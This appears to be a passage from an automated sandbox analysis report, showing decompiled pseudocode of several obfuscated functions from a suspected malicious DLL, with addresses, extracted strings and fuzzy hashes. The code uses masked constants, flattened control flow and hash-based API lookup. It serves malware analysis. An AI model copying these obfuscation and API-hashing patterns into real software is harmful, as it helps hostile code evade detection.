				_v52 = 0xca9e;
				_v52 = _v52 + 0xffffaa95;
				_v52 = _v52 ^ 0x00003a71;
				_v16 = 0x1985;
				_v16 = _v16 ^ 0x7d67dffe;
				_v16 = _v16 | 0x92ef9f7f;
				_v16 = _v16 / _t119;
				_v16 = _v16 ^ 0x026a2075;
				_push(_v28);
				_push(_v32);
				E1000A4D7(_v16, _v44, _v12, _v40, _v8, E10005DFC(_v24, _v36, _v16), _a20, _a12, __ecx);
				return E10010D6D(_v20, _v52, _v16, _t114);
			}

0x10003604
0x10003609
0x1000360c
0x1000360f
0x10003612
0x10003615
0x10003616
0x10003617
0x1000361c
0x10003625
0x1000362c
0x10003633
0x1000363a
0x10003647
0x1000364a
0x1000364d
0x10003654
0x1000365b
0x10003662
0x10003669
0x10003670
0x10003677
0x1000367e
0x10003685
0x10003689
0x10003690
0x1000369c
0x1000369d
0x100036a2
0x100036a9
0x100036b0
0x100036b7
0x100036be
0x100036c2
0x100036c9
0x100036d0
0x100036d4
0x100036db
0x100036e2
0x100036e9
0x100036f4
0x100036f9
0x100036fc
0x10003703
0x1000370a
0x10003711
0x10003715
0x10003719
0x10003720
0x10003727
0x1000372e
0x10003735
0x1000373c
0x10003743
0x1000374f
0x10003752
0x10003759
0x1000375c
0x10003783
0x100037a1

Strings

q:, xrefs: 1000372E
)/, xrefs: 10003689
mh., xrefs: 10003719

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: )/$mh.$q:
API String ID: 0-1096206879
Opcode ID: 83986a1feba6484aff31c348c6ff45d44a705b08ae65d655c4735191510a25f4
Instruction ID: 9c9583cd82884d782dd7f11af85b8cc4238a1ea67ac898f1b2790fe15771b91c
Opcode Fuzzy Hash: 83986a1feba6484aff31c348c6ff45d44a705b08ae65d655c4735191510a25f4
Instruction Fuzzy Hash: 6F412376D0020DEBEF09CFA1C84A8DEBFB2FB08314F108159E811761A0D7B91A55DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 1000327F Relevance: 3.8, Strings: 3, Instructions: 56
COMMONCrypto

Download Yara Rule

C-Code - Quality: 58%

			E1000327F(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				unsigned int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _t46;
				intOrPtr* _t56;
				signed int _t59;
				signed int _t60;
				void* _t66;

				_t66 = __ecx;
				E10012550(_t46);
				_v20 = 0x3156;
				_v20 = _v20 << 0xe;
				_v20 = _v20 ^ 0x0c55a35f;
				_v12 = 0x42ee;
				_t59 = 0x54;
				_v12 = _v12 / _t59;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 4;
				_v12 = _v12 ^ 0x00000e02;
				_v8 = 0x7d69;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 >> 2;
				_v8 = _v8 >> 0xb;
				_v8 = _v8 ^ 0x00007fcf;
				_v16 = 0xcf80;
				_v16 = _v16 >> 2;
				_t60 = 0x65;
				_v16 = _v16 / _t60;
				_v16 = _v16 ^ 0x000022b9;
				_t56 = E10007378(_t60, 0x92ff481d, _t60, 0x90f109b3, 0x80);
				return  *_t56(_t66, _a4, __ecx, __edx, _a4, _a8);
			}

0x10003289
0x10003290
0x10003295
0x1000329f
0x100032a5
0x100032ac
0x100032b8
0x100032bd
0x100032c2
0x100032c6
0x100032ca
0x100032d1
0x100032d8
0x100032dc
0x100032e0
0x100032e4
0x100032eb
0x100032f2
0x100032f9
0x10003301
0x10003304
0x10003323
0x10003335

Strings

V1, xrefs: 10003295
i}, xrefs: 100032D1
B, xrefs: 100032AC

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: V1$i}$B
API String ID: 0-126001315
Opcode ID: e9ea08993b24c1a24ae5d337309e7aa82eff9c3c9ebb2c494d47034f813f44ed
Instruction ID: fa03c35d71e13f60442b54f75ef1109a56cc181a809daa73685ea3a966035c4c
Opcode Fuzzy Hash: e9ea08993b24c1a24ae5d337309e7aa82eff9c3c9ebb2c494d47034f813f44ed
Instruction Fuzzy Hash: D4111476D0060CBBEB09DFD5C84A8DEBBB1EB44708F10C089E914A7285D7B56B58CF80

Uniqueness

Uniqueness Score: -1.00%

Function 10014C37 Relevance: 2.7, Strings: 2, Instructions: 178
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E10014C37(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				char _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				void* _t135;
				signed int _t149;
				void* _t150;
				signed int _t153;
				char _t156;
				signed int _t157;
				void* _t160;
				char* _t166;
				void* _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int* _t191;

				_push(_a8);
				_t181 = __ecx;
				_push(_a4);
				_push(0x40);
				_push(__ecx);
				E10012550(_t135);
				_v20 = 0x10;
				_t191 =  &(( &_v76)[4]);
				_v72 = 0x33a2;
				_t157 = 0;
				_t160 = 0x15bff311;
				_t182 = 0x47;
				_v72 = _v72 / _t182;
				_v72 = _v72 + 0x9922;
				_v72 = _v72 >> 4;
				_v72 = _v72 ^ 0x00004e71;
				_v52 = 0xaaa1;
				_v52 = _v52 << 9;
				_v52 = _v52 ^ 0x01552e09;
				_v76 = 0x962f;
				_v76 = _v76 << 2;
				_v76 = _v76 + 0xc5a1;
				_v76 = _v76 + 0xb22d;
				_v76 = _v76 ^ 0x0003d8ea;
				_v40 = 0xc003;
				_v40 = _v40 << 1;
				_v40 = _v40 ^ 0x0001b379;
				_v44 = 0x4990;
				_t183 = 0x43;
				_v44 = _v44 / _t183;
				_v44 = _v44 ^ 0x000010a0;
				_v48 = 0xc7fb;
				_v48 = _v48 + 0xffffc7ce;
				_v48 = _v48 ^ 0x0000a883;
				_v36 = 0x594;
				_v36 = _v36 | 0x90aa143f;
				_v36 = _v36 ^ 0x90aa6018;
				_v28 = 0x8261;
				_v28 = _v28 >> 0xc;
				_v28 = _v28 ^ 0x0000298c;
				_v32 = 0xe41c;
				_v32 = _v32 + 0xffff1d18;
				_v32 = _v32 ^ 0x00004603;
				_v68 = 0xf178;
				_v68 = _v68 ^ 0xb2146a6f;
				_v68 = _v68 << 0xd;
				_v68 = _v68 + 0xffff14e1;
				_v68 = _v68 ^ 0x9361c313;
				_v60 = 0xf75;
				_t184 = 7;
				_v60 = _v60 / _t184;
				_v60 = _v60 + 0xffffaefc;
				_v60 = _v60 ^ 0xffffe5ce;
				_v56 = 0xf098;
				_t185 = 0x29;
				_v56 = _v56 / _t185;
				_v56 = _v56 >> 0xa;
				_v56 = _v56 ^ 0x0000430d;
				_v24 = 0x878b;
				_t186 = 0x32;
				_v24 = _v24 / _t186;
				_v24 = _v24 ^ 0x000010f8;
				_v64 = 0xb5f1;
				_v64 = _v64 << 1;
				_v64 = _v64 + 0xd2ca;
				_v64 = _v64 * 0x3b;
				_v64 = _v64 ^ 0x00840c1f;
				L1:
				while(_t160 != 0xc9ebeee) {
					if(_t160 == 0x15bff311) {
						_t160 = 0xc9ebeee;
						continue;
					}
					if(_t160 == 0x185136eb) {
						_push(0x10001484);
						_push(_v48);
						_t150 = E1001CF31(_v40, _v44, __eflags);
						E1000A6C9(__eflags);
						_t153 = E1001990C(_v28, __eflags, _v32, _v68, 0x40, _v60, _t181,  &_v16, _t150);
						__eflags = _t153;
						_t133 = _t153 > 0;
						__eflags = _t133;
						_t157 = 0 | _t133;
						E10010D6D(_v56, _v24, _v64, _t150);
						L22:
						return _t157;
					}
					if(_t160 != 0x2cfa89b3) {
						L19:
						__eflags = _t160 - 0x12976092;
						if(__eflags != 0) {
							continue;
						}
						goto L22;
					}
					_t166 =  &_v16;
					if(_v16 == _t157) {
						L14:
						_t160 = 0x185136eb;
						continue;
					} else {
						goto L6;
					}
					do {
						L6:
						_t156 =  *_t166;
						if(_t156 < 0x30 || _t156 > 0x39) {
							if(_t156 < 0x61 || _t156 > 0x7a) {
								if(_t156 < 0x41 || _t156 > 0x5a) {
									 *_t166 = 0x58;
								}
							}
						}
						_t166 = _t166 + 1;
					} while ( *_t166 != _t157);
					goto L14;
				}
				_t149 = E1001226D( &_v20, _v72, _v52, _v76,  &_v16);
				_t191 =  &(_t191[3]);
				__eflags = _t149;
				if(__eflags == 0) {
					_t160 = 0x12976092;
					goto L19;
				}
				_t160 = 0x2cfa89b3;
				goto L1;
			}

0x10014c3e
0x10014c42
0x10014c44
0x10014c48
0x10014c4a
0x10014c4b
0x10014c50
0x10014c58
0x10014c5b
0x10014c69
0x10014c6b
0x10014c72
0x10014c77
0x10014c7d
0x10014c85
0x10014c8a
0x10014c92
0x10014c9a
0x10014c9f
0x10014ca7
0x10014caf
0x10014cb4
0x10014cbc
0x10014cc4
0x10014ccc
0x10014cd4
0x10014cd8
0x10014ce0
0x10014cec
0x10014cf1
0x10014cf7
0x10014cff
0x10014d07
0x10014d0f
0x10014d17
0x10014d1f
0x10014d27
0x10014d2f
0x10014d37
0x10014d3c
0x10014d44
0x10014d4c
0x10014d54
0x10014d5c
0x10014d64
0x10014d6c
0x10014d71
0x10014d79
0x10014d81
0x10014d8d
0x10014d92
0x10014d98
0x10014da0
0x10014da8
0x10014db4
0x10014db7
0x10014dbb
0x10014dc0
0x10014dca
0x10014dd8
0x10014de5
0x10014de9
0x10014df1
0x10014df9
0x10014dfd
0x10014e0a
0x10014e0e
0x00000000
0x10014e16
0x10014e20
0x10014e5e
0x00000000
0x10014e5e
0x10014e24
0x10014e9d
0x10014ea2
0x10014eae
0x10014eb9
0x10014ed9
0x10014ee0
0x10014eeb
0x10014eeb
0x10014eeb
0x10014ef2
0x10014efd
0x10014f03
0x10014f03
0x10014e2c
0x10014e8f
0x10014e8f
0x10014e95
0x00000000
0x00000000
0x00000000
0x10014e9b
0x10014e2e
0x10014e36
0x10014e5a
0x10014e5a
0x00000000
0x00000000
0x00000000
0x00000000
0x10014e38
0x10014e38
0x10014e38
0x10014e3c
0x10014e44
0x10014e4c
0x10014e52
0x10014e52
0x10014e4c
0x10014e44
0x10014e55
0x10014e56
0x00000000
0x10014e38
0x10014e77
0x10014e7c
0x10014e7f
0x10014e81
0x10014e8a
0x00000000
0x10014e8a
0x10014e83
0x00000000

Strings

C, xrefs: 10014DC0
qN, xrefs: 10014C8A

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: C$qN
API String ID: 0-790040163
Opcode ID: e7a5c298d8227cb0f2eb418cb95504ce7e00d2a6028b4aa1e4ed4c63faa0569f
Instruction ID: 0a8a9f5295c7e5b474cf1da8557aaa0d751e8e8e185bc09f115e4d21cf476f3d
Opcode Fuzzy Hash: e7a5c298d8227cb0f2eb418cb95504ce7e00d2a6028b4aa1e4ed4c63faa0569f
Instruction Fuzzy Hash: 5B7174715083419FD354CF26C98955FBBE1FBC5B58F40881CF1958A2A0DBB5CA8A8F83

Uniqueness

Uniqueness Score: -1.00%

Function 100057D4 Relevance: 2.7, Strings: 2, Instructions: 161
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E100057D4(void* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				char _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				signed int _v84;
				unsigned int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				void* __ecx;
				void* _t131;
				intOrPtr _t147;
				signed int _t154;
				signed int _t155;
				signed int _t156;
				void* _t159;
				intOrPtr* _t177;
				void* _t179;
				void* _t180;

				_t177 = _a4;
				_t176 = _a16;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_t177);
				_push(__edx);
				E10012550(_t131);
				_v80 = 0x4cb2ed;
				_v76 = 0;
				_t180 = _t179 + 0x18;
				_v72 = 0;
				_v108 = 0x9c5c;
				_t159 = 0x3368839;
				_v108 = _v108 ^ 0xd3e57123;
				_v108 = _v108 ^ 0x4ad8fda9;
				_v108 = _v108 ^ 0x993d5beb;
				_v88 = 0xf9a5;
				_v88 = _v88 >> 0x10;
				_v88 = _v88 ^ 0x0000103e;
				_v120 = 0xbbb7;
				_t154 = 0x79;
				_v120 = _v120 / _t154;
				_v120 = _v120 + 0xffffc937;
				_v120 = _v120 ^ 0xd13f0730;
				_v120 = _v120 ^ 0x2ec0cb4d;
				_v104 = 0xc6c8;
				_v104 = _v104 | 0xbfb93240;
				_v104 = _v104 << 8;
				_v104 = _v104 ^ 0xb9f6c47b;
				_v124 = 0xc4b4;
				_v124 = _v124 + 0x286;
				_t155 = 0x5f;
				_push("true");
				_v124 = _v124 * 0xf;
				_v124 = _v124 + 0x3b2;
				_v124 = _v124 ^ 0x000bab89;
				_v128 = 0xc484;
				_v128 = _v128 + 0xba23;
				_v128 = _v128 >> 4;
				_v128 = _v128 | 0x65c5919c;
				_v128 = _v128 ^ 0x65c5d8de;
				_v100 = 0x428;
				_v100 = _v100 << 6;
				_v100 = _v100 << 0xe;
				_v100 = _v100 ^ 0x4280342d;
				_v116 = 0x3c02;
				_v116 = _v116 << 4;
				_v116 = _v116 / _t155;
				_pop(_t156);
				_v116 = _v116 / _t156;
				_v116 = _v116 ^ 0x000042c4;
				_v84 = 0x30d9;
				_v84 = _v84 ^ 0x97ed8beb;
				_v84 = _v84 ^ 0x97eda4f0;
				_v92 = 0x87d4;
				_v92 = _v92 + 0xffff3816;
				_v92 = _v92 << 6;
				_v92 = _v92 ^ 0xffefeeaa;
				_v96 = 0xe0b5;
				_v96 = _v96 * 0x4f;
				_v96 = _v96 + 0xffff6770;
				_v96 = _v96 ^ 0x0044a5e8;
				_v112 = 0x5d17;
				_v112 = _v112 ^ 0xac640b72;
				_v112 = _v112 + 0xffff1fa4;
				_v112 = _v112 << 7;
				_v112 = _v112 ^ 0x31bb0480;
				do {
					while(_t159 != 0x3368839) {
						if(_t159 == 0x227ced25) {
							E1000F834( *_t176, _v100,  &_v68, _v116);
							_t180 = _t180 + 8;
							_t159 = 0x333b911b;
							continue;
						} else {
							if(_t159 == 0x240f0f59) {
								E1000FEE3(_t177,  &_v68, _v120, _v104, _v124, _v128);
								_t180 = _t180 + 0x10;
								_t159 = 0x227ced25;
								continue;
							} else {
								if(_t159 == 0x25527f2b) {
									_push(_t159);
									_t147 = E100054FB( *(_t177 + 4));
									 *_t177 = _t147;
									__eflags = _t147;
									if(__eflags != 0) {
										_t159 = 0x240f0f59;
										continue;
									}
								} else {
									if(_t159 == 0x303334f6) {
										 *(_t177 + 4) = E10010672(_t176);
										_t159 = 0x25527f2b;
										continue;
									} else {
										_t188 = _t159 - 0x333b911b;
										if(_t159 != 0x333b911b) {
											goto L15;
										} else {
											E1000BAD2(_v84, _v92, _t188, _t176 + 4,  &_v68, _v96);
										}
									}
								}
							}
						}
						L8:
						return 0 |  *_t177 != 0x00000000;
					}
					_t159 = 0x303334f6;
					 *_t177 = 0;
					 *(_t177 + 4) = _v112;
					L15:
					__eflags = _t159 - 0x19576d5a;
				} while (__eflags != 0);
				goto L8;
			}

0x100057dd
0x100057e5
0x100057ec
0x100057ed
0x100057f4
0x100057fb
0x100057fc
0x100057fe
0x10005803
0x1000580d
0x10005811
0x10005814
0x1000581a
0x10005822
0x10005827
0x1000582f
0x10005837
0x1000583f
0x10005847
0x1000584c
0x10005854
0x10005862
0x10005867
0x1000586d
0x10005875
0x1000587d
0x10005885
0x1000588d
0x10005895
0x1000589a
0x100058a2
0x100058aa
0x100058b7
0x100058b8
0x100058ba
0x100058be
0x100058c6
0x100058ce
0x100058d6
0x100058de
0x100058e3
0x100058eb
0x100058f3
0x100058fb
0x10005900
0x10005905
0x1000590d
0x10005915
0x10005922
0x1000592a
0x1000592d
0x10005931
0x10005939
0x10005941
0x10005949
0x10005951
0x10005959
0x10005961
0x10005966
0x1000596e
0x1000597b
0x1000597f
0x10005987
0x10005994
0x1000599c
0x100059a4
0x100059ac
0x100059b1
0x100059b9
0x100059b9
0x100059cb
0x10005a87
0x10005a8c
0x10005a8f
0x00000000
0x100059d1
0x100059d3
0x10005a66
0x10005a6b
0x10005a6e
0x00000000
0x100059d5
0x100059db
0x10005a3c
0x10005a3d
0x10005a42
0x10005a45
0x10005a47
0x10005a49
0x00000000
0x10005a49
0x100059dd
0x100059e3
0x10005a27
0x10005a2a
0x00000000
0x100059e5
0x100059e5
0x100059eb
0x00000000
0x100059f1
0x10005a06
0x10005a0b
0x100059eb
0x100059e3
0x100059db
0x100059d3
0x10005a0f
0x10005a1f
0x10005a1f
0x10005a9d
0x10005aa2
0x10005aa4
0x10005aa7
0x10005aa7
0x10005aa7
0x00000000

Strings

%|", xrefs: 100059C5
%|", xrefs: 10005A6E

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: %|"$%|"
API String ID: 0-2582732878
Opcode ID: 60e29652dc2165e8f256d14fa822249d67059f5fe67010c7fe92581947bf8306
Instruction ID: 83ab7f88f1f3e41b79dd3e5bcac662915628fbb4a3d6d5eac868a3870d207a03
Opcode Fuzzy Hash: 60e29652dc2165e8f256d14fa822249d67059f5fe67010c7fe92581947bf8306
Instruction Fuzzy Hash: EB7142712093419FE394CF21C98981FBBE1FB84798F509A1DF1C696264C7799A49CB43

Uniqueness

Uniqueness Score: -1.00%

Function 10002208 Relevance: 2.6, Strings: 2, Instructions: 126
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E10002208(intOrPtr* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char _v332;
				char _t130;
				void* _t131;
				void* _t135;
				signed int _t137;
				signed int _t138;
				signed int _t139;
				char* _t140;
				intOrPtr* _t156;

				_v60 = _v60 & 0x00000000;
				_v72 = 0xe3568;
				_v68 = 0x2883ad;
				_v64 = 0x1a7bf3;
				_v44 = 0xf414;
				_v44 = _v44 ^ 0x8770b590;
				_v44 = _v44 ^ 0x87700964;
				_v36 = 0xb854;
				_v36 = _v36 << 7;
				_v36 = _v36 ^ 0x005c6a34;
				_v12 = 0x1e6f;
				_v12 = _v12 ^ 0xf4069a1b;
				_v12 = _v12 << 0xd;
				_t156 = __ecx;
				_t137 = 0x57;
				_v12 = _v12 / _t137;
				_v12 = _v12 ^ 0x0265e4d2;
				_v24 = 0x8571;
				_v24 = _v24 + 0xffff3aa5;
				_v24 = _v24 | 0x45c7521f;
				_v24 = _v24 ^ 0xffffa68c;
				_v56 = 0xe2bc;
				_v56 = _v56 + 0xac59;
				_v56 = _v56 ^ 0x0001c024;
				_v28 = 0xc379;
				_v28 = _v28 >> 5;
				_v28 = _v28 >> 5;
				_v28 = _v28 ^ 0x00005cee;
				_v32 = 0x29f6;
				_t138 = 0x70;
				_v32 = _v32 / _t138;
				_t139 = 0x16;
				_t140 =  &_v332;
				_v32 = _v32 / _t139;
				_v32 = _v32 ^ 0x0000381e;
				_v20 = 0x6921;
				_v20 = _v20 ^ 0xc84b8620;
				_v20 = _v20 ^ 0xee2afc44;
				_v20 = _v20 * 0x68;
				_v20 = _v20 ^ 0x976f8b66;
				_v52 = 0x2d40;
				_v52 = _v52 + 0xe0f;
				_v52 = _v52 ^ 0x00002a29;
				_v48 = 0x9fae;
				_v48 = _v48 >> 3;
				_v48 = _v48 ^ 0x00003426;
				_v8 = 0x1268;
				_v8 = _v8 + 0xffffad14;
				_v8 = _v8 + 0xfbd;
				_v8 = _v8 | 0x03aa70af;
				_v8 = _v8 ^ 0xffff927e;
				_v40 = 0x43b2;
				_v40 = _v40 >> 5;
				_v40 = _v40 ^ 0x00005849;
				_v16 = 0x2e64;
				_v16 = _v16 | 0x5ee4e259;
				_v16 = _v16 * 0x35;
				_v16 = _v16 >> 0x10;
				_v16 = _v16 ^ 0x0000e727;
				while(1) {
					_t130 =  *_t156;
					if(_t130 == 0) {
						break;
					}
					if(_t130 == 0x2e) {
						 *_t140 = 0;
					} else {
						 *_t140 = _t130;
						_t140 = _t140 + 1;
						_t156 = _t156 + 1;
						continue;
					}
					L6:
					_t131 = E1001A03C( &_v332, _v44, _v36, _v12, _v24);
					_t157 = _t131;
					if(_t131 != 0) {
						L8:
						_push(E10011D2B(_v32, _t156 + 1, _v20, _v52) ^ 0x0c5c2292);
						_push(_v16);
						_push(_v40);
						_push(_v8);
						return E1001C4DD(_v48, _t157);
					}
					_t135 = E1000F04C( &_v332, _v56, _v28);
					_t157 = _t135;
					if(_t135 != 0) {
						goto L8;
					}
					return _t135;
				}
				goto L6;
			}

0x10002211
0x10002217
0x1000221e
0x10002225
0x1000222c
0x10002233
0x1000223a
0x10002241
0x10002248
0x1000224c
0x10002253
0x1000225a
0x10002261
0x1000226c
0x1000226e
0x10002273
0x10002278
0x1000227f
0x10002286
0x1000228d
0x10002294
0x1000229b
0x100022a2
0x100022a9
0x100022b0
0x100022b7
0x100022bb
0x100022bf
0x100022c6
0x100022d0
0x100022d5
0x100022dd
0x100022e0
0x100022e6
0x100022e9
0x100022f0
0x100022f7
0x100022fe
0x10002309
0x1000230c
0x10002313
0x1000231a
0x10002321
0x10002328
0x1000232f
0x10002333
0x1000233a
0x10002341
0x10002348
0x1000234f
0x10002356
0x1000235d
0x10002364
0x10002368
0x1000236f
0x10002376
0x10002381
0x10002384
0x10002388
0x10002399
0x10002399
0x1000239d
0x00000000
0x00000000
0x10002393
0x100023a1
0x10002395
0x10002395
0x10002397
0x10002398
0x00000000
0x10002398
0x100023a4
0x100023b6
0x100023bb
0x100023c2
0x100023dc
0x100023f4
0x100023f5
0x100023f8
0x100023fb
0x00000000
0x10002406
0x100023d0
0x100023d5
0x100023da
0x00000000
0x00000000
0x1000240e
0x1000240e
0x00000000

Strings

4j\, xrefs: 1000224C
Y^, xrefs: 10002376

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: 4j\$Y^
API String ID: 0-2203625362
Opcode ID: 2ab281e20babec8f914e23fe26d2a0305b4f6cc775f439d274d1a935f3a080a8
Instruction ID: f2ee956a436e1dbb6e6e37c60b1293d2178681422dc8079194228fbf84217864
Opcode Fuzzy Hash: 2ab281e20babec8f914e23fe26d2a0305b4f6cc775f439d274d1a935f3a080a8
Instruction Fuzzy Hash: 04513371C0121AEBEF19CFE5D94A5EEBBB1FF04304F208199D511B62A0D7B91A4ACF90

Uniqueness

Uniqueness Score: -1.00%

Function 10013F4F Relevance: 2.6, Strings: 2, Instructions: 115
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E10013F4F(signed int __ecx, intOrPtr* __edx) {
				char _v520;
				signed int _v524;
				intOrPtr _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _t63;
				signed int _t65;
				signed int _t69;
				signed int _t70;
				void* _t79;
				signed int _t80;
				void* _t81;
				signed int _t84;
				intOrPtr* _t87;
				signed int* _t88;

				_t70 = __ecx;
				_t88 =  &_v564;
				_v524 = _v524 & 0x00000000;
				_v528 = 0x208792;
				_v540 = 0xd4e9;
				_v540 = _v540 + 0xffffc88b;
				_v540 = _v540 ^ 0x0000d9d0;
				_v532 = 0x336b;
				_v532 = _v532 | 0xfe809e09;
				_v532 = _v532 ^ 0xfe80eed9;
				_v564 = 0x8dd7;
				_v564 = _v564 << 9;
				_v564 = _v564 ^ 0x316f6ec5;
				_v564 = _v564 + 0xffffc640;
				_v564 = _v564 ^ 0x307484c3;
				_v536 = 0x3e91;
				_v536 = _v536 + 0xa90d;
				_v536 = _v536 ^ 0x0000a803;
				_v560 = 0xf01b;
				_v560 = _v560 << 0x10;
				_v560 = _v560 * 0x4f;
				_t87 = __edx;
				_v560 = _v560 ^ 0x18550a74;
				_t69 = __ecx;
				_v552 = 0x212a;
				_t81 = 0x2a877a8b;
				_v552 = _v552 * 0x19;
				_v552 = _v552 ^ 0x00030550;
				_v544 = 0xd358;
				_v544 = _v544 | 0x5b8e85e0;
				_v544 = _v544 ^ 0x5b8ed83a;
				_v556 = 0x81e1;
				_v556 = _v556 ^ 0x5f3d7dd3;
				_v556 = _v556 ^ 0x5f3de0ae;
				_t80 = _v556;
				_v548 = 0x11a6;
				_v548 = _v548 << 1;
				_v548 = _v548 ^ 0x000056ff;
				while(_t81 != 0xa9a8994) {
					if(_t81 == 0x1592b590) {
						_push( &_v520);
						_t63 = E1001B165(_t69, _t87);
						asm("sbb esi, esi");
						_t70 = 0x10001020;
						_t84 =  ~_t63 & 0xf51449f8;
						L9:
						_t81 = _t84 + 0x29fbdc3d;
						continue;
					}
					if(_t81 == 0x1f102635) {
						_push(0);
						_push(0);
						_push(_v544);
						_push(_v552);
						_push(_v560);
						_push(_v536);
						_push( &_v520);
						_push(0);
						_t65 = E10006417(_v564, __eflags);
						_t88 =  &(_t88[8]);
						asm("sbb esi, esi");
						_t84 =  ~_t65 & 0xe09ead57;
						__eflags = _t84;
						goto L9;
					}
					if(_t81 == 0x29fbdc3d) {
						return E1000DE81(_v556, _t80, _v548);
					}
					if(_t81 != 0x2a877a8b) {
						L12:
						__eflags = _t81 - 0x1e6f5ee2;
						if(__eflags != 0) {
							continue;
						} else {
							return _t65;
						}
						L15:
						return _t65;
					}
					_t79 = 0x50;
					_t65 = E100054FB(_t79);
					_t80 = _t65;
					_t70 = _t70;
					if(_t80 != 0) {
						_t81 = 0x1592b590;
						continue;
					}
					goto L15;
				}
				 *((intOrPtr*)(_t80 + 0x44)) = _t69;
				_t81 = 0x1e6f5ee2;
				 *_t80 =  *0x10021084;
				 *0x10021084 = _t80;
				goto L12;
			}

0x10013f4f
0x10013f4f
0x10013f55
0x10013f5a
0x10013f62
0x10013f6a
0x10013f72
0x10013f7a
0x10013f82
0x10013f8a
0x10013f92
0x10013f99
0x10013f9d
0x10013fa4
0x10013fab
0x10013fb2
0x10013fba
0x10013fc2
0x10013fca
0x10013fd2
0x10013fe0
0x10013fe4
0x10013fe6
0x10013fee
0x10013ff0
0x10013ff8
0x10014002
0x10014006
0x1001400e
0x10014016
0x1001401e
0x10014026
0x1001402e
0x10014036
0x1001403e
0x10014042
0x1001404a
0x1001404e
0x10014056
0x10014068
0x100140f5
0x100140fd
0x10014107
0x10014109
0x1001410a
0x100140e4
0x100140e4
0x00000000
0x100140e4
0x10014074
0x100140b1
0x100140b3
0x100140b5
0x100140bd
0x100140c1
0x100140c5
0x100140cd
0x100140ce
0x100140d0
0x100140d5
0x100140dc
0x100140de
0x100140de
0x00000000
0x100140de
0x1001407c
0x00000000
0x10014144
0x10014088
0x10014127
0x10014127
0x1001412d
0x00000000
0x00000000
0x00000000
0x00000000
0x1001414f
0x1001414f
0x1001414f
0x10014099
0x1001409a
0x1001409f
0x100140a1
0x100140a4
0x100140aa
0x00000000
0x100140aa
0x00000000
0x100140a4
0x10014112
0x10014115
0x1001411f
0x10014121
0x00000000

Strings

*!, xrefs: 10013FF0
k3, xrefs: 10013F7A

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

